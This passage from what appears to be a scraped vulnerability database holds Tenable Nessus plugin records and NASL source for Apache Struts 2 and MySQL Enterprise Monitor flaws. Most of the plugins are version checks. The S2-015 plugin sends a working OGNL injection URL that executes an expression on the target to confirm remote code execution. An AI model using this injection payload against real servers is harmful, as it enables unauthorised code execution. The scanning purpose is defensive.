script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"3.0.11\";\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (version =~ \"^3\\.0($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:18", "description": "The remote web server is using a version of Struts 2 that is affected by multiple vulnerabilities :\n\n - A cross-site request forgery vulnerability exists due to the token generator failing to adequately randomize the token values. An attacker can exploit this issue by extracting a token from a form and then predicting the next token value that will be used to secure form submissions. By convincing a victim to visit a specially crafted form, the predicted token value can be used to force an action for a logged in user. Note that this vulnerability can only be exploited when the <s:token/> tag is used within a form. (CVE-2014-7809)\n\n - A cross-site scripting vulnerability exists due to improper validation of input passed via the 'Problem Report' screen when using debug mode. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in the context of a user's browser session.\n (CVE-2015-5169)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-12-10T00:00:00", "type": "nessus", "title": "Apache Struts 2 Multiple Vulnerabilities (S2-023) (S2-025)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7809", "CVE-2015-5169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_20_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/79860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79860);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7809\", \"CVE-2015-5169\");\n script_bugtraq_id(71548, 76625);\n\n script_name(english:\"Apache Struts 2 Multiple Vulnerabilities (S2-023) (S2-025)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a web application that uses a Java\nframework that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is using a version of Struts 2 that is affected\nby multiple vulnerabilities :\n\n - A cross-site request forgery vulnerability exists due to\n the token generator failing to adequately randomize the\n token values. An attacker can exploit this issue by\n extracting a token from a form and then predicting the\n next token value that will be used to secure form\n submissions. By convincing a victim to visit a specially\n crafted form, the predicted token value can be used to\n force an action for a logged in user. Note that this\n vulnerability can only be exploited when the <s:token/>\n tag is used within a form. (CVE-2014-7809)\n\n - A cross-site scripting vulnerability exists due to\n improper validation of input passed via the 'Problem\n Report' screen when using debug mode. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to execute arbitrary script\n code in the context of a user's browser session.\n (CVE-2015-5169)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-025.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/WW-4423\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.16.3\", \"fixed_version\" : \"2.3.20\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xss:TRUE, xsrf:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:34", "description": "The remote web application appears to use Struts 2, a web framework used for creating Java web applications. The version of Struts 2 in use is affected by a security constraint bypass vulnerability due to a flaw in the action mapping mechanism. Under certain unspecified conditions, an attacker could exploit this issue to bypass security constraints. \n\nNote that this version of Struts 2 is known to have Dynamic Method Invocation (DMI) enabled by default. This can expose Struts 2 to additional vulnerabilities so it is recommended that DMI be disabled. (CVE-2013-4316)\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-09-27T00:00:00", "type": "nessus", "title": "Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_2.NASL", "href": "https://www.tenable.com/plugins/nessus/70168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70168);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4310\", \"CVE-2013-4316\");\n script_bugtraq_id(62584);\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a security constraint bypass\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nused for creating Java web applications. The version of Struts 2 in\nuse is affected by a security constraint bypass vulnerability due to a\nflaw in the action mapping mechanism. Under certain unspecified\nconditions, an attacker could exploit this issue to bypass security\nconstraints. \n\nNote that this version of Struts 2 is known to have Dynamic Method\nInvocation (DMI) enabled by default. This can expose Struts 2 to\nadditional vulnerabilities so it is recommended that DMI be disabled. \n(CVE-2013-4316)\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-018.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.15.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nif (max_index(urls) == 0)\n audit(AUDIT_WEB_FILES_NOT, \"Struts 2 .action / .do / .jsp\", port);\n\nurls = list_uniq(urls);\n\nscript = SCRIPT_NAME - \".nasl\" + '-' + unixtime();\nvuln = FALSE;\n\nforeach url (urls)\n{\n vuln_url = url + \"?action:\" + script;\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n # Verify our 404 page contains our script name and verify that\n # .action was not appended to our script name as this would\n # indicate that 2.3.15.2 or later is in use\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> .*/\" + script &&\n res[2] !~ \"\\<b\\>message\\</b\\> .*/\" + script + \"\\.action\"\n )\n {\n vuln = TRUE;\n break;\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\noutput = strstr(res[2], \"message\");\nif (empty_or_null(output)) output = res[2];\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:15:07", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.4.1. It, therefore, is affected by multiple vulnerabilities including a Denial of Service (DoS) and cross-site request forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4386", "CVE-2012-4387"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-4386\", \"CVE-2012-4387\");\n script_bugtraq_id(54346, 55346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.4.1. It, therefore, is affected by multiple\nvulnerabilities including a Denial of Service (DoS) and cross-site\nrequest forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.4.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.4\", \"fixed_version\" : \"2.3.4.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xsrf:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:07", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. (CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default.\n (CVE-2013-4316)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-4316"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "href": "https://www.tenable.com/plugins/nessus/83292", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83292);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2013-2251\", \"CVE-2013-4316\");\n script_bugtraq_id(61189, 62587);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by the multiple vulnerabilities\nin the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution\n of arbitrary Object-Graph Navigation Language (OGNL)\n expressions via specially crafted parameters to the\n DefaultActionMapper. (CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to\n dynamic method invocation being enabled by default.\n (CVE-2013-4316)\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac29c174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.14\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:37:32", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66931);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\nforeach url (urls)\n{\n magic = rand();\n vuln = FALSE;\n\n vuln_url = url + \"/${\" + magic + \"+5}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"404 Not Found\") &&\n ((magic + 5) >< res[2])\n )\n {\n vuln = TRUE;\n output = strstr(res[2], \"<h1>\");\n break;\n }\n\n msg = SCRIPT_NAME - \".nasl\" + \"-\" + magic;\n vuln_url = url + \"/${%23w%3d%23context.get('com.opensymphony.xwork2.\" +\n \"dispatcher.HttpServletResponse').getWriter(),\"+\n \"%23w.print('Nessus%20Response:%20'),%23w.println('\" +msg+\n \"'),%23w.flush(),%23w.close()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ \"^Nessus Response: \"+msg)\n )\n {\n vuln = TRUE;\n output = chomp(res[2]);\n break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 3,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : output\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:46", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a remote command execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.3 RCE (S2-015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117389);\n script_version(\"1.11\");\n 